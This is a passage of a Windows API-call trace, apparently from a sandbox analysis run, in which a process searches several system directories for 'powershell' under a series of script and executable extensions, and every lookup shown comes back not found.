	[0440.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.256] SetErrorMode (uMode=0x1) returned 0x1
	[0440.256] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.256] SetErrorMode (uMode=0x1) returned 0x1
	[0440.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.257] SetErrorMode (uMode=0x1) returned 0x1
	[0440.257] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.257] SetErrorMode (uMode=0x1) returned 0x1
	[0440.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.257] SetErrorMode (uMode=0x1) returned 0x1
	[0440.257] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.258] SetErrorMode (uMode=0x1) returned 0x1
	[0440.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.258] SetErrorMode (uMode=0x1) returned 0x1
	[0440.258] FindFirstFileW (lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c80db40) 
	[0440.259] SetErrorMode (uMode=0x1) returned 0x1
	[0440.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.259] SetErrorMode (uMode=0x1) returned 0x1
	[0440.259] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.260] SetErrorMode (uMode=0x1) returned 0x1
	[0440.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.260] SetErrorMode (uMode=0x1) returned 0x1
	[0440.260] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.260] SetErrorMode (uMode=0x1) returned 0x1
	[0440.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.260] SetErrorMode (uMode=0x1) returned 0x1
	[0440.261] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.261] SetErrorMode (uMode=0x1) returned 0x1
	[0440.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.261] SetErrorMode (uMode=0x1) returned 0x1
	[0440.261] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.261] SetErrorMode (uMode=0x1) returned 0x1
	[0440.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.262] SetErrorMode (uMode=0x1) returned 0x1
	[0440.262] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.262] SetErrorMode (uMode=0x1) returned 0x1
	[0440.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.262] SetErrorMode (uMode=0x1) returned 0x1
	[0440.263] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.263] SetErrorMode (uMode=0x1) returned 0x1
	[0440.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0440.263] SetErrorMode (uMode=0x1) returned 0x1
	[0440.263] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.264] SetErrorMode (uMode=0x1) returned 0x1
	[0440.264] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.264] SetErrorMode (uMode=0x1) returned 0x1
	[0440.264] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.264] SetErrorMode (uMode=0x1) returned 0x1
	[0440.264] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.265] SetErrorMode (uMode=0x1) returned 0x1
	[0440.265] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.265] SetErrorMode (uMode=0x1) returned 0x1
	[0440.265] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.265] SetErrorMode (uMode=0x1) returned 0x1
	[0440.265] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.265] SetErrorMode (uMode=0x1) returned 0x1
	[0440.266] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.266] SetErrorMode (uMode=0x1) returned 0x1
	[0440.266] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.266] SetErrorMode (uMode=0x1) returned 0x1
	[0440.266] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.266] SetErrorMode (uMode=0x1) returned 0x1
	[0440.267] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.267] SetErrorMode (uMode=0x1) returned 0x1
	[0440.267] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.267] SetErrorMode (uMode=0x1) returned 0x1
	[0440.267] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.267] SetErrorMode (uMode=0x1) returned 0x1
	[0440.268] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.268] SetErrorMode (uMode=0x1) returned 0x1
	[0440.268] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.268] SetErrorMode (uMode=0x1) returned 0x1
	[0440.268] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.268] SetErrorMode (uMode=0x1) returned 0x1
	[0440.268] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.269] SetErrorMode (uMode=0x1) returned 0x1
	[0440.269] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.269] SetErrorMode (uMode=0x1) returned 0x1
	[0440.269] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.269] SetErrorMode (uMode=0x1) returned 0x1
	[0440.270] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.270] SetErrorMode (uMode=0x1) returned 0x1
	[0440.270] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.270] SetErrorMode (uMode=0x1) returned 0x1
	[0440.270] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.270] SetErrorMode (uMode=0x1) returned 0x1
	[0440.271] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.271] SetErrorMode (uMode=0x1) returned 0x1
	[0440.271] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.271] SetErrorMode (uMode=0x1) returned 0x1
	[0440.271] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.271] SetErrorMode (uMode=0x1) returned 0x1
	[0440.272] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.272] SetErrorMode (uMode=0x1) returned 0x1
	[0440.272] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.272] SetErrorMode (uMode=0x1) returned 0x1
	[0440.272] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.272] SetErrorMode (uMode=0x1) returned 0x1
	[0440.273] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.273] SetErrorMode (uMode=0x1) returned 0x1
	[0440.273] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0440.273] SetErrorMode (uMode=0x1) returned 0x1
	[0440.273] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.273] SetErrorMode (uMode=0x1) returned 0x1
	[0440.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.274] SetErrorMode (uMode=0x1) returned 0x1
	[0440.274] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.275] SetErrorMode (uMode=0x1) returned 0x1
	[0440.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.275] SetErrorMode (uMode=0x1) returned 0x1
	[0440.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.275] SetErrorMode (uMode=0x1) returned 0x1
	[0440.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.276] SetErrorMode (uMode=0x1) returned 0x1
	[0440.276] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.276] SetErrorMode (uMode=0x1) returned 0x1
	[0440.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.276] SetErrorMode (uMode=0x1) returned 0x1
	[0440.276] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.277] SetErrorMode (uMode=0x1) returned 0x1
	[0440.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.277] SetErrorMode (uMode=0x1) returned 0x1
	[0440.277] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.277] SetErrorMode (uMode=0x1) returned 0x1
	[0440.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.278] SetErrorMode (uMode=0x1) returned 0x1
